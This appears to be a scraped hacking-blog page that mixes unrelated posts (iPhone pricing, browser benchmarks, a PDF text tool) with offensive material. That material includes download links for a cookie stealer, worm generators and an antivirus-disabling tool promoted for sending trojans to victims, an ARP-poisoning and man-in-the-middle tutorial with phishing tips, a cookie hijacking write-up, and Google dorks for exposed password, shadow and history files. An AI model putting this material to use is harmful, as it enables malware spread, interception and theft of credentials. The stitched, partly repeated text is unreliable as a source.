due some prod i cant post the article but i have uploaded it the document to
rapid share
http://rapidshare.com/files/70483309/coockie_steelier.txt
coockes steelier
virus codes
WormGen
WormGen , as its name describe,its a Worm Generator.Use this tool to creat a Worm.Use your custom messages and infections for lammers.Click the download link below to download it. Remember to disable your anti virus software (at your pc).Otherwise your antivirus would`nt allow to use it.
http://www.geocities.com/darfun_victims/wormgen.zip
Worm Gen 2.0
Its also Worm Generator ,its verision 2.0,updated. Try it.
http://www.geocities.com/darfun_victims/wormgen2.zip
Norton Killer
Here is software that disables victim`s anti virus if its Norton AV.Useful for those who are trying to send Trojans to the victim, send this file to the victim before sending a Trojan so your Trojan will not be detected.
http://www.geocities.com/darfun_victims/norton_killer.zip.zip
Add A Splash Screen To Mozilla Firefox
I don’t know why splash screens were made. But they can add some and masala and mint to a software, they look nice and beautiful. Many softwares such as Adobe Photoshop, Flash and many others already have splash screens but our beloved browser, Firefox lacks one. Some may say that splash screens are nagging and interfere in our work but for others they offer a refreshing start for our work.
Splash!
Is an extension for Mozilla products which can add splash screens not only to Firefox but also to Flock, Thunderbird and Sunbird.
You just have to select any image which has to act as the splash, select the background color, specify if there should be any text displayed or sound played and Voila! You have your own splash screen ready.
If you like, you can create your own splash screen (or just keep the photo of your dear ones) or have one ready made from here Ready Made Splash Screens.
Well, my favorite is this one
New iPhone comes Only for 8k!
Apple on Monday unveiled a new version of its popular Apple iPhone, equipped with 3G Internet access and more business-related features.“It’s incredibly zippy,” chief executive Steve Jobs said as he demonstrated the new mobile device at the opening of Apple’s annual Worldwide Developers Conference in San Francisco.“We’ve taken what we’ve learned with the first iPhone, and created the iPhone 3G; and it’s beautiful,” he said.The crowd cheered when Jobs said the iPhone 3G will cost $199 (Rs 8,500 approx) with 8GB of memory. The 16GB model will sell for $299 (Rs 13,000 approx).The iPhone 3G – said to be two times faster than the firstgen iPhone – is designed for longer talk times, and takes advantage of the high-speed network to provide built-in GPS mapping, Jobs said.It also includes Wi-Fi support, and push email service like the one on Blackberry devices, letting business users send and receive Microsoft Exchange email.Apple announced it will begin rolling out new versions of the sleek smartphone devices on July 11, and make it available in 70 countries.Bharti Airtel and Vodafone, who had both announced tieups with Apple to release the iPhone in India, said they will be offering the Apple iPhones here. Details of pricing and availability will be announced at a later date. AGENCIES
Basics ARP Poison routing
Introduction This paper will lay out for you the basics of an ARP Poison Routing (APR) attack and Man in the Middle (Mitm) attacks. These are very simple attacks, but can be very powerful on unsecured networks. These attacks are so easy I could provide you a walkthrough of how to do this in Cain in about one paragraph, but you wouldn’t learn anything and would become a skiddy.
Before reading this, I suggest you learn a little about networks and the OSI 7-layer model (http://www.webopedia.com/quick_ref/OSI_Layers.asp) and media access control (MAC) addresses, as these attacks take advantage of protocols that work on OSI layers other than what you are usually used to (ie, HTTP on layer 7 and TCP on layer 4, whereas ARP works on layer 2) and do not use only IP addresses for identifying computers.
Address Resolution Protocol:
The Address Resolution Protocol (ARP) is a layer 2 protocol that maps IP addresses to hardware MAC addresses. When a computer wants to find another computer on its network, it uses the ARP to identify where that computer is and how to reach it. There are 9 types of ARP packets, but only 4 are relevant here:
1. ARP – What MAC has this IP address?If you are trying to contact a computer on another network (ie, over the internet) then ARP is used to contact your border gateway and route packets to it. The gateway is then responsible for routing the packets to the desire network using IP addresses and various routing protocols instead of ARP. Once the packet has arrived at the correct network, the router that received it will then use ARP again to route the packet around the network to its final destination.
2. ARP Response – This MAC has this IP address.
3. RARP – What IP has this MAC address?
4. RARP Response – This IP has this MAC address.
The address resolution protocol works on a stateless broadcast request/single reply communication model. This means when one computer wants to know the address of another; it will broadcast a request for the address across the whole network in the form of What computer is 123.123.123.123? Tell 00:FF:AC:C5:56:3B. The computer that has the IP address of 123.123.123.123 would then send a directed reply, NOT broadcast, saying 90:F5:63:CA:BB:32 has 123.123.123.123. The MAC address in the reply is then added to the local computer’s cache, or if a mapping already exists for either the IP or MAC being used, the cache is updated to reflect this new info. The MAC/IP mapping is then used to route traffic around the network.
ARP Poison Routing (APR)
Now that you know the basics of how ARP works, let’s explore some pitfalls in the protocol. As I’ve said before, ARP is a stateless protocol. This means that each computer does not remember the state of its ARP requests/replies, and thus, does not remember if it sent a request or if it is waiting for a reply or has already received a reply to a previous request. So if we send an ARP reply, the host will accept it and alter its cache accordingly, even if the host didn’t send out a request! So if we send a reply to a target computer saying that our MAC address corresponds to the local gateway’s IP, then any traffic coming out of the target computer bound for the internet will be instead routed to your computer. You can use this to execute a DoS attack and prevent any packets from the target computer reaching the internet or you can sniff the packets for passwords and then pass them on to the real gateway. The second method is a very effective way of getting sensitive information and is fairly undetectable unless the target is monitoring their ARP cache constantly. APR can be setup with either 1-way or 2-way poisoning. 1-way poisoning will only poison the cache of a single target and will only intercept traffic coming from that computer, as shown below:
Figure 1: 1-way APR
2-way poisoning effectively puts your computer directly between 2 target computers so that you can intercept network traffic coming from either host, as shown below:
Figure 2: 2-way APR
Some interesting attacks that can be used with APR include DoS attacks, Network sniffing/Packet stealing, and phishing.
DoS attacks can be accomplished using a 1-way poison and by redirecting traffic from a target computer to a gateway that doesn’t exist so they get ICMP Host Unreachable errors for all their network traffic, or you can redirect it to your computer and simply refuse to forward it to the proper destination. Network sniffing and packet stealing as well as Man in the Middle (Mitm) attacks require a 2-way poisoning scheme. Network sniffing and packet stealing would allow you to steal passwords and hashes that are passed over the network. With the proper filters, you can easily pick out plaintext passwords such as FTP, SMTP, HTTP form data, and hashes such as AIM and Yahoo messenger and SQL. You can even listen in on NetBios sessions and Telnet connections. With some simple phishing filters on your APR tool, you can redirect people from one website to one you control that looks the same where the victim will type in their login info unsuspectingly. This is often useful for grabbing plaintext passwords rather than having to brute force password hashes
One of the greatest hazards to be aware of when using APR is unintentional DoSing of the target or the entire network; because your computer is most likely NOT a dedicated router, and because the packets must travel all the way up the OSI model, be analyzed by your sniffer, then repackaged and sent all the way down the OSI model again, your computer can not handle packet routing as efficiently as a dedicated hardware router. This costs a great amount of time and CPU cycles and slows down the flow of traffic that may end up backing up and DoSing the target, the network, your computer, or any combination of the three. This is a serious issue and should not be taken lightly. If you APR a router on a large network, you may have hundreds of thousands of packets going thru your computer each second. Another hazard that is of interest to hackers is the fact that proxies cannot effectively be used, because ARP and APR works on layer 2 and proxies work on either layer 5 or 7 (depending on the amount of anonymity used) and usually require traveling outside the network to a proxy server. This may seem like a huge safety issue for a hacker, but there is hope! While IP addresses are difficult to spoof over the internet while keeping traffic flowing to and from your computer, both the IP address and MAC address can be effectively altered on a LAN. Many tools exist for changing your MAC and IP during APR attacks. Cain provides an option to do this under the “Configure” menu item.
Man In The Middle (Mitm) Attacks
Mitm attacks include a range of possible attacks, from DoSing, to sniffing, phishing, and rerouting for SE purposes. Mitm is started with a 2-way APR attack that in effect inserts your computer between 2 targets (often a host and a gateway). You can then begin the real meat of the mitm by using customized programs and packet filters to gain the effect you need.
For a simple sniffing attack, a network sniffer such as Ethereal with an IP or MAC filter applied to only capture packets to or from the target is sufficient. For more advanced attacks like password grabbing and phishing, you need more advanced filters. In the case of grabbing passwords, you need to have a filter that disassembles the packet to get to the layer 4 data and above, then scan that data for plaintext passwords or hashes such as HTTP POST or GET data, FTP, SMTP, or SQL login info, or you can use a filter to capture an entire NetBios, Telnet, or VoIP session to record conversations and gather potentially sensitive information. Sometimes it is not always desirable to have a password hash, especially when you can get the plaintext password in less time. This is where phishing comes in. Phishing is the art of constructing a website to look exactly like another, then redirecting traffic from the real site to the one you control in the hopes that no one will notice and will happily type in their real login info, assuming that everything is as it should be. Great care should be taken in conducting a phishing style attack, and I will offer some pointers and methods later on.
Because mitm attacks are built on the back of an APR attack, then all the limitations of an APR attack also apply to a mitm attack. But with the increased complexity of a mitm attack, you must also be aware of further limitations. Using complex filters or packet scanners consumes a lot of CPU cycles and can further increase the risk of unintentional DoSing or breaking of the network. Phishing should be used with care as well, because even the smallest difference between your site and the legitimate one will be noticed by daily users and may raise suspicion.
Phishing
Phishing, as already stated, is making a fake site to fool people into giving you their plaintext passwords and login info. There are several methods for creating a phishing site (phishing lure :D). You can attempt to create your copy site from scratch and code it yourself, but chances are people who use the site regularly would know the difference. Another way would be to copy the source code, images (keeping the directory structure in tact), and any stylesheets, javascripts, or embedded objects, then just make a few small changes to the code. Make sure to change all relative directories to absolute URLs when you do this! If you don’t, a form may not direct to the right page or produce a 404 error or an image may not display right and will raise suspicion. This method produces a site that looks and behaves nearly identically to the original, but because it is still being hosted on another server under a different domain name, observant users may spot the anomaly and report it. For low profile targets, this method is fast and effective. The final method I will discuss is how to do it without making a fake site at all. Because you are executing a mitm attack and have full access to every packet that moves to and from the target, you can create a packet filter that will change the ACTION property of a
Browser Speed Tests: Which Is Fastest?
Google's new Chrome web browser beta is getting a lot of attention for its slick looks, helpful features, and performance, but how does it rank against the early releases of more established browsers? We've previously put the major browser releases to the speed test, but today we're measuring Chrome against the second beta of Internet Explorer 8, as well as the beta of Firefox 3's next iteration, 3.1. We tested tomorrow's browsers on startup and page-loading times, JavaScript and CSS performance, and, perhaps most importantly to the average user, memory use on launch and with lots of content loaded. Read on to get the scoop on which bleeding-edge beta has the edge in the browser time trials.
The Tests
As with my previous browser tests, I installed completely fresh copies of the three browsers on my Windows Vista laptop, with all settings left to defaults. With the second beta of Internet Explorer 8, I reset the browser to factory settings and chose whatever Microsoft suggested during the click-through setup.
My test system has the same specs as before: A 2 GHz Intel Core 2 Duo processor, 2GB of memory, and running Windows Vista Home Premium. For the time-based tests, I again used Rob Keir's ultra-lightweight timer app, simultaneously tapping the "\" key with "Enter" to launch a browser shortcut or folder full of bookmarks. I performed each test on each browser three times and averaged out the results, while eliminating obvious oddities. (With Vista's often empirical hard drive usage, there were definitely artificially long start-ups).It's the same system I used to test Internet Explorer 7, Firefox 3 RC3, Safari for Windows, and Opera 9.5, so you can make fair comparisons between all the browsers. It's not scientific in the strict sense, but it's meant to measure browser performance as real humans experience it—load, click, and wait.
Test 1: Startup Time—Winner: Chrome!
Drawing inspiration again from Mark Wilton-Jones trend-setting tests, I timed each browser loading up "cold" load (straight off a system restart) and "warm" (having run twice already). I used a locally-saved copy of Google's minimalist home page to negate net connection variations, and, to compensate for Vista's start-up fickleness, timed each browser exactly two minutes after boot-up. Here are the first results:
Note the small scale of the time on the X-axis: Even though Chrome was (quite surprisingly) slower at startup than Firefox or even IE 8, it's less than a second of difference between them all. That's a bit more than an error from my twitchy fingers, but probably not enough to rate any one browser on. Let's check out the warm boots:
As you can see, Chrome's noticeably fast on reload, although all the results are so close it's hard to confidently crown a winner. Just like last time, IE 8 slightly edges out Firefox on warm boots, but lags just a bit behind when starting up.
You don't start your browser to look at clean, white, locally-saved pages, do you? No, you speed around your must-visit sites, and often keep a bushel of them open at once. For the next test, I led each browser page-by-page through the assortment of web sites pictured at right—some heavy with interactive elements, some just text and pictures—before jumping back to a blank page (entering about:blank does this in any browser) and loading all the links at once. Each browser keeps a spinning icon on tabs as they load, so I measured from first click to the last tab settling in.
IE 8 and Chrome clock in too close to call, but Firefox fell behind. Based on the minuscule difference in cold-boot time and the two warm tests, I'd call Chrome the fastest, but definitely hand IE 8 a Most Improved Player trophy at the awards banquet.
Test 2: JavaScript & CSS—Tie: Firefox & Chrome!
JavaScript continues to grow in importance as a browser benchmark, because it's the backbone of no-reload interfaces like Gmail, Facebook, and lots of other webapps. Once again I used Sean Patrick Kane's revised JavaScript speed tests and averaged out three results to measure the browsers:
Firefox bests Chrome in this test by a handy lead, while IE 8 takes nearly twice as long (in milliseconds, of course) to perform all the actions Sean runs it through. It's anybody's guess who's got the most objective test—CNET's testers show Chrome wrecking all comers, while Mozilla's own tests declare their orange scrapper the winner in tight races. I can only take away that IE 8 is definitely an improvement from IE 7's fall-behind pace, while Chrome and Firefox are pretty evenly matched...
...until I ran the CSS tests, that is. CSS determines the layout and appearance of a page, and nontropp's downloadable form makes a browser work like a page designer on an all-guarana-and-coffee diet.
In the CSS test, as you can see, Chrome takes a commanding lead, Firefox doesn't lag too far behind, and IE 8 actually stalled and froze on just about one of every two loads I ran. When it came out of memory freeze, it did report consistent times, though—consistently behind. One could hand the Dynamic Web Performance title to Firefox for the probably weightier JavaScript test, but Chrome also shows a notable grace in running down the type frequently found on blogs. Let's call this a tie.
Test 3: Memory Use—Winner: Firefox!
How far the great-great-nephew of Netscape has come in its respect for your system's resources. Measured by Vista's Task Manager from cold boots and then with eight tabs loaded, Firefox shows some serious savvy with megabytes:
Do note, however, that Chrome handles tabs differently than others—each tab loads as its own process, so that if it crashes or stalls, the rest of your reading doesn't go down with it. So if you've got solid-state chips to spare, it's not that much more of a hit to run Chrome in a busy session.
As with our last test, we'll note that browsing is much more than speed and bit usage—many of us can't imagine web life without our favorite extensions, or Windows integration, or, soon enough, Chrome's unique features.
source life hacker
How to Extract text from PDF, DOC, HTML, CHM, and RTF files
You can use Text-Mining-Tool to automatically extract text from a PDF file so that you can use it in any program freely. Or if you cannot open a PDF file because you do not have a PDF viewer installed, you can use this tool to extract the text and read the document.
Text Mining Tool is completely free and does not even require an installation, simply unzip it and run the program to use it.
text mining tool
Click the Open button and choose your file that you want to convert to text. Click ok and the large window below the buttons will eventually fill with all of the text extracted from the document.
extract text
Click Save to save the extracted text to your computer. You can also click Clipboard to copy the mined text to the Windows clipboard.
For convenience, the following hotkeys can be used to perform the operations:
* Open - F3 or O.
* Save - F2 or S.
* Clipboard - F5 or C.
* Exit - F10 or Escape.
You can also use the minetext console tool to create a batch script for extracting text from multiple files. This can be useful if you have a directory with a large number of files that need to have text extracted.
Cookies Unveiled
By entr0py
Section 1 - Introduction
Whenever you visit a page in the Internet you are always sleuthed by the Dark Shadows of the Webmaster. They sleuth you by the means of a simple text file called as Cookies. I am not talking about those flat sweet cakes. These cookies are very dangerous because whatever you do, whenever you do, they follow you everywhere...
Section 2 - What exactly is a Cookie?
Cookie is an extremely small piece of information transmitted by the Web Server to your system, so that it can retrieve your personal information from that particular browser. It is usually saved in the browser's temporary directory. It is usually stored in the memory of the system. Cookies can only tell whether you have visited the page before or not. It is sort of a counter which stores important data in a minuscule file. Cookies are indisputably the most authentic way to acquire information about an Internet user. Cookies are often used as password grabber. What I mean to say by this is that cookies are often used for storing password, so that you don't have to type it off again and again.
Section 3 - Where do I find Cookies?
Cookies are found easily in all the major web browsers like Firefox, Internet Explorer and Netscape. You must know the storage basin, to access the cookies spitefully. Okay, so I have listed the areas of the storage below:
- Internet Explorer: Tools - Internet Options
- Netscape 4: Open the file cookies.txt in your favorite text editor like Notepad or Wordpad.
- Netscape 6: Edit - Preferences, select privacy and security, then select view stored cookies
- Mozilla Firefox: Options - Privacy, click on Privacy tab and then Cookies. Click on View Cookies, to view them one by one.
- Mac: Cookies on a MAC are commonly stored in "Magic Cookies" folder.
Whenever a cookie is set in your system, the information extracted from them is supposed to direct the browser of the domains approved by the specific cookie. When you open a cookie you get loads of information about the user who browsed the particular website, which transmitted a cookie in the system. Let me give you an example to show the typical data you will get when you view a cookie file:
Name: yahoo
Content: z=zBs9EBzHB.EBTt5g--&a=AAE&sk=DAA8Vv0fUjh6er&d=c0E-:203.156.22.11
Domain: yahoo.com
Path: /
Send For: Any type of connections
Expires: At end of session
In the above example you can clearly see that I am visiting Yahoo. The content is a multifaceted code, which can be easily exploited. You can also see my IP address has been stored.
Section 4 - Varieties of Cookies
There are just two major types cookies, which invades your system.
- Advertising Cookies
Cookies are sometimes saved through Advertisements. You must have seen loads of pointless advertisements present in a website. The basic mechanism of the invasion is quiet straightforward. Just before the Advertisement loads, a text file sets itself in your system. It garners useful information about your surfing habits, so as to match them with their portfolio. It also lets them count the number of visits.
A typical advertisement cookie would be like this:
Name: TZID
Content: 2087143250694530103
Domain: .ad.uk.tangozebra.com
Path: /a
Send For: Any type of connections
Expires: At end of session
- Forum Cookies
Cookies stored by Web Forums are the most precarious variety of cookie because a few amendments of data can lead to a major invasion of privacy. The most vulnerable vendor is phpBB; it can be harnessed easily via modules available in the Internet. I may say that vBulletin is the most unassailable Bulletin Board System.
A typical forum cookie would be like this:
Name: sb_netsec_ccip
Content: a%3A2%3A%7Bs%3A9%3A%22Anonymous%22%361%3B%7D
Domain: forums.securitybay.org
Path: /phpBB
Send For: Any type of connections
Expires: At end of session
Section 5 - What are Cookies used for?
Cookies have acquired as an insecure form of data depot because of its propensity of storing passwords and other personal information. They are also used for saving preferences of the homepage. A malicious use who has an access to the cookies can easily decipher them to gather information about the legitimate user. He cannot just open the file and get the information. He has to access it by a Cookie Grabber and then edit the codings to get fruitful results. Cookies have some advantageous uses too. Site Surfing is the most advantageous use of Cookies. Suppose you are visiting any site like Rediff. You don't want to check all the offers presented by them. So, after denying it, you will not get it until the cookie expires. You must have also seen the innovative implementation of a new option called "Remember Me" in forums and mail sites. This makes your surfing much more hassle-free than usual, but yes, it is quite dangerous as it can be exploited very roughly.
Section 6 - How do Cookies Function?
The functionality of a Cookie isn't complex. They are very straightforward to understand. Here is an example of a cookie, which I am going to elaborate profusely:
Set-Cookie:TZID=VALUE;
Expires= At end of session;
Path=/a
Domain= .ad.uk.tangozebra.com
Now, let me elaborate the above script set by the cookie:
TZID=VALUE
This thread is a series of characters, there is a requirement to emplace data like name or the specific value. There is some encoding required for the above script. Encoding like URL style %XX is suggested.
Expires= At end of session
This feature defines a specific date thread which validates the time of the cookie. When the expiration date is attained, then the cookie becomes unusable.
Path=/a
This feature is used to define the division of the URL in a specific domain. If the path is not given, then it is assumed that path is the same document positioned in the header of the cookie.
Domain= .ad.uk.tangozebra.com
This feature defines the specific domain from which the cookie has been stored.
Section 7 - Getting Rid of Cookies
Invalidating Cookies
In Internet Explorer 6, go to Tools, then Internet Options and then click on privacy. Then slide the bar to whichever point you are satisfied. When you are contented, select OK or Apply.
In Internet Explorer 4 and 5, go to Tools, then Internet Options, after that Security. Choose Internet, and then click on Custom level. Scroll down to Cookies and pick Disable.
In Netscape Navigator, go to Edit and then Preferences. Choose advanced, check "Disable Cookies" and press OK.
NOTE: Some sites like Yahoo! Require cookies.
Deleting Cookies
Internet Explorer 5: Just open the folder C:\Windows\Temporary Internet Files\Now, you will see some text files, select all of them and delete them.
Internet Explorer 6: Go to Tools, then Internet Options, Press "Delete Cookies" and press ok.
Netscape 4: Open the file cookies.txt using your favorite text editor and delete the objects.
Netscape 6: Go to Edit, then Preferences, then select Privacy and Security, then click on View Stored Cookies. Choose "Remove All Cookies".
Section 8 - Cookie Hijacking
It is the law of the computing nature that cookies can only be read by the domains which created and stored it. Quite a few exploits has been initiated to allow cookies to be managed. Let me intricate one exploit, which is a very popular exploit used by malicious attackers. In this exploit, the attacker can access anyone's cookie by simply knowing the cookie's name and supplementing three dots in the domain panel.
www.anysite.com.../getcookie.cgi
The three dots affixed after the domain name can trick the web browser. The web browser won't recognize the origin of the cookie. It won't know whether it is from the supplicant or it has been approved to read. If the cookie is read by malevolent attacker, then he will surely use the cookie to emulate the legitimate user. So, Cookie Hijacking can be defined as when an attacker steals a cookie of a legitimate user and emulates malicious operations. Cookie Hijacking can be so potent, that it can even trounce SSL. What happens is that whenever a secure connection is instituted and the same connection is connected to another unsecured website, then the cookie becomes unencrypted and thus it can be penetrated easily.
Security Note: Microsoft released a patch to prevent cookie hijacking from IIS servers. You can get more information by viewing Security Bulletin MS00-080.
Section 9 - Cookie Spoofing
An attacker can easily utilize legitimate user's cookie to impersonate as the user on a specific site. As I have earlier told you that an attacker can acquire cookie via cookie hijacking. But, imagine if the website which stored the cookie has infixed password information in their cookie! The attacker can easily infiltrate any website by the means of the legitimate user's cookie as he can gather fruitful information from the cookie. This may comprise password information, credit card information, and personal information like phone number, residence address etc. Let me tell you that hijacking cookies can be potentially strong, but hijacking session cookies is one of the most powerful attacks because it gives you a fuller access to a specific websites. To prevent these attacks, one must be aware of the threats. Secondly to repress the usage of session cookies, the webmaster should reduce the session time of the cookie, like if the expiry of these cookies is 30 minute, then the webmaster should reduce it to 15 minutes. Thirdly if you can encipher the cookie or affix a Message Authentication Code to the footer of the cookie. Cookie Spoofing is one of the easiest to practice, but it can be precarious if altered maliciously. Like, if you hijack a cookie and adjust your cookie, so that it shows the hijacked cookie, then you can enter any website by the means of the hijacked cookie. Once you enter you can infuse malwares in the web server. Well I don't encourage crime, but I am just describing you what an attacker can do if he gets an access to your cookies.
Section 10 - Conclusion
Okay, now let me tell you that staying anonymous on the web is almost impossible. It is not an automated process of getting tracked; it is the malicious usage of cookie. A delicate alteration of a cookie can lead to many problems. So it's better to be aware of the threats, so that you try your best to prevent these attacks. Don't wait, just act fast because these attacks are going to be more and more potent and destructive.
Using google to hack, crack, and just plain find what you need
Before we begin, I strongly recommend reading through http://www-db.stanford.edu/~backrub/google.html
#This article will help you understand the inner workings of a search engine (if you're not already ereet)
#I added a copy of this article to the end of this text, so just scroll down a little ways :)
What is this tutorial about?
-It's about using google to get the information you need, fast
Why should I read it?
-Because at the end of this tutorial, you'll be able to use google to find WHATEVER you need!
Why are you writing it?
-Because all of the ereet programmers at irc.smart-dev.com/irc.zoite.net are tired of people asking us questions,
when they could just ask lord google
Do I need to gather any tools for this tutorial?
-A web browser (i.e. lynx, mozilla), and confidence in the fact that you aren't inept
Now the 'tutorial'
Google is the shit. You can find virtually ANYTHING you want with it. "©2003 Google - Searching 3,083,324,652 web
pages" as of Sunday, February 16, 2003! I use google for pretty much anything. Any question you have can be answered
90% of the time in the first 20 results, if you search properly. In the next few sections I will be going over some
basic/advanced/UBER COOL techniques for searching.
I.Getting started
-Open your web browser, and goto www.google.com (if it isn't your homepage, which it should be!)
-Now, click on preferences- Most of this should be fine preset, but make sure you fill in the "do not filter my
search results," and select 100 results per page from the drop down menu, then fill in the last bubble (if thats
your thing). Click save preferences (note: they will only be saved if you have cookies enabled).
-Now that you have everything set up, let's see everything google has to offer (because google has a slew of useful
tools). First theres the web search, which is the topic of this article. After that theres the image search, which
is pretty useful if you want to find a picture of someone you know (I will go into detail later on), or if you just
wannt to find some free porn! Sicko. Next up: Groups. I LOVE this feature! You can search year, and years, and years,
of posts on USENET discussion boards. I have gotten SO much valuable information (mostly stuff to help me crack my
target) just by using this feature. I will also go indepth on this feature as well. Next to last: Directory searching.
This is pretty useful if you want to find information on a TOPIC. For instance if you wanted to do a biology project
on genetic disorders you would use this. Last up: News. This is a fairly new feature, added a few months ago. It
tells you how recent articles are (by the hour, pretty cool!). You can look at world news on World, U.S., buisness,
Science/Tech, Sports, Entertainment, and Health.
II.Google for Web searches
(BASIC)
-Well, you've got a broad sense of what google does, so lets get right into the specifics! I can hardly wait!
A. Deciding on keywords
-Try specific keywords first (i.e. search for elephant as opposed to animals)
-Make searches as specific as you can.
-Keep searches as specific as you can!
+Note: The more specific you want your search to be, the more words you need, and you'll get less results
(this can be a bad or good thing)
B. How it works
-When you search for hacker tutorials, google interprets it as hacker AND tutorials, so it returns only pages
with all of the keywords you entered by default
-When you search for tutorials for hackers, the word for is omitted, as are all other words like if, a, who,
what, when, where, and how. If you need to include a common word in your search phrase use a '+' before the
common word. Your search is now tutorials +for hackers.
+note: google is not case sensitive
+note: google does not use wildcards (searching for googl* will not return google)
(ADVANCED)
A. ""'s
-Using quotations is probably the most important part of an advanced search. You can really control the
results of your search using quotes. When you use quotes, all of your results will contain the exact phrase.
So if you were to search "Tutorial for hacking" Google would search 3,083,324,652 web sites for that exact
phrase.
-You can put part of your search in quotes, and the other a regular search. For instance, if I wanted to find
out what pages my friend that just happens to be a girl is on the internet, I would search "Firstname
Lastname" Thomas Dale. This would search for the exact phrase "her name" and then it would search for any
pages that contained the words Thomas Dale(Thomas Dale is my highschool).
+Find me! My name is alejandro(alex), and i'm part of the smart-dev community ;)
B. "-"'s
-Using '-' to omit results. Perhaps you're searching for a new type of password file, for a new webserver.
The password file is called passwerd.db, but when you do a simple in title search(just keep reading, you'll
understand later) all you get is a bunch of results that turn out to be a config file that has syntax
referring to passwerd.db. Lets say this config file is named config(go figure). Omit this from your search
simply by searching searchstring -config and viola you get a list of sites that display passwerd.db to the
public! You can also use the boolean term NOT.
(HACKING/CRACKING)
Yay! This is why I wrote this article!
INTRO TO HACKING/CRACKIGN WITH GOOGLE
-Many of you probably already know this, but you can hack/crack with google. I use it in 100% of the
hacks/cracks I perform. You can use google to help you hack/crack in a few different ways. I will discuss
these in the sections below ("no shit!")
A. intitle:
-This is a built in function in google that searches for your phrase in the title of a web page. The
title of a webpage is in the upper left of your current window. (you should see google.txt if someone
hasnt changed the name). This is useful if you want to find something VERY specific.
-examples: intitle:"billing" intitle:"payments" intitle:"passwd"
B. Directory Indexing
-One GREAT trick is to find sites that allow directory indexing. This can be done by searching
intitle:"index of" phrase. Your mind should now be about to explode with the possibilities this could
hold. If it doesn't, that's ok, because if you look at the end of this article you'll see i've
provided you with an uber cool list! Here are some basic phrases you can use: intitle:"index of"
"passwd" OR "passwd.txt" OR "AutismIsSoCool!". This searches for files named passwd or if that isnt
found, searches for passwd.txt or if that isnt found searches for AutismIsCool! Think original, and
you can come up with the coolest stuff! I'm not just talking about passwords... I'm talking about
warez, passwords, and even credit card numbers!!! (although to be honest it's not easy ;))
C. allinurl:
-Guess what this does! Basically I use this when I want to find a piece of software. When i'm at school we
have some stupid web site filter, that doesn't allow me to download AIM (AOL instant messenger uhhh tm) so
basically I just do a search for allinurl:"aim.exe" and I get to take my pick! This can also be used for
passwd, passwd.txt, and so on
D. Cache
-Perhaps you have been searching for intitle:"index of" etc/shadow, and you see what looks like a valid
shadow file in your results list, but you cant access it, because you arent root, or whatever. Well thanks to
google cache, it may be possible for you to view this file. Just click the little chached link under the
result!
+note: this doesnt work 100% of the time
E. Collecting info on your target
-You can use google to find all sorts of juicy information about your target. For instance, if you wanted to
know what @target.com addresses were on the site, just search "@target.com" site:www.target.com. You should
get a nice list of email addresses. (these can double as usernames for other things besides emails)
-GOOGLE GROUPS is a great way to get info on a target. Just click the groups tab and search for @target.com,
and you will see everything anyone from your target has EVER posted on a usenet board! This is a real good
one!
THATS IT! THAT'S THE WHOLE TUTORIAL!
Summary: Well I hope you learned something from this article. Wether you were a complete noob, an advanced internet user,
or an ereet hacker, I tried to teach you all something. Remember- don't ever give up after only a few minutes of
searching... You'll get the right combination of keywords sooner or later. Just try to imagine what words you would use
for the item you are trying to find ;). Now GO! I officialy deem you "Google lord!"
(APPENDIX A)
-This is a list of all the cool searches I've found over the years
-PLEASE add to it! add your searches, and put the date you added it next to the search, then upload it somewhere
allinurl: winnt/system32/ (get cmd.exe)
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart **GOOD ONE!
-and hey! wouldnt you know it! someone has already taken care of the rest of this appendix for me! Thanks Johnny!
/*/*/*The following list was taken from johnny.ihackstuff.com*\*\*\
_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
default.asp
showcode.asp
sendmail.cfm
getFile.cfm
imagemap.exe
test.bat
msadcs.dll
htimage.exe
counter.exe
browser.inc
hello.bat
default.asp\\
dvwssr.dll
cart32.exe
add.exe
index.jsp
SessionServlet
shtml.dll
index.cfm
page.cfm
shtml.exe
web_store.cgi
shop.cgi
upload.asp
default.asp
pbserver.dll
phf
test-cgi
finger
Count.cgi
jj
php.cgi
php
nph-test-cgi
handler
webdist.cgi
webgais
websendmail
faxsurvey
htmlscript
perl.exe
wwwboard.pl
www-sql
view-source
campas
aglimpse
glimpse
man.sh
AT-admin.cgi
AT-generate.cgi
filemail.pl
maillist.pl
info2www
files.pl
bnbform.cgi
survey.cgi
classifieds.cgi
wrap
cgiwrap
edit.pl
perl
names.nsf
webgais
dumpenv.pl
test.cgi
submit.cgi
guestbook.cgi
guestbook.pl
cachemgr.cgi
responder.cgi
perlshop.cgi
query
w3-msql
plusmail
htsearch
infosrch.cgi
publisher
ultraboard.cgi
db.cgi
formmail.cgi
allmanage.pl
ssi
adpassword.txt
redirect.cgi
cvsweb.cgi
login.jsp
dbconnect.inc
admin
htgrep
wais.pl
amadmin.pl
subscribe.pl
news.cgi
auctionweaver.pl
.htpasswd
acid_main.php
access.log
log.htm
log.html
log.txt
logfile
logfile.htm
logfile.html
logfile.txt
logger.html
stat.htm
stats.htm
stats.html
stats.txt
webaccess.htm
wwwstats.html
source.asp
perl
mailto.cgi
YaBB.pl
mailform.pl
cached_feed.cgi
global.cgi
Search.pl
build.cgi
common.php
show
global.inc
ad.cgi
WSFTP.LOG
index.html~
index.php~
index.html.bak
index.php.bak
print.cgi
register.cgi
webdriver
bbs_forum.cgi
mysql.class
sendmail.inc
CrazyWWWBoard.cgi
search.pl
way-board.cgi
webpage.cgi
pwd.dat
adcycle
post-query
help.cgi
#This article will help you understand the inner workings of a search engine (if you're not already ereet)
#I added a copy of this article to the end of this text, so just scroll down a little ways :)
What is this tutorial about?
-It's about using google to get the information you need, fast
Why should I read it?
-Because at the end of this tutorial, you'll be able to use google to find WHATEVER you need!
Why are you writing it?
-Because all of the ereet programmers at irc.smart-dev.com/irc.zoite.net are tired of people asking us questions,
when they could just ask lord google
Do I need to gather any tools for this tutorial?
-A web browser (i.e. lynx, mozilla), and confidence in the fact that you aren't inept
Now the 'tutorial'
Google is the shit. You can find virtually ANYTHING you want with it. "©2003 Google - Searching 3,083,324,652 web
pages" as of Sunday, February 16, 2003! I use google for pretty much anything. Any question you have can be answered
90% of the time in the first 20 results, if you search properly. In the next few sections I will be going over some
basic/advanced/UBER COOL techniques for searching.
I.Getting started
-Open your web browser, and goto www.google.com (if it isn't your homepage, which it should be!)
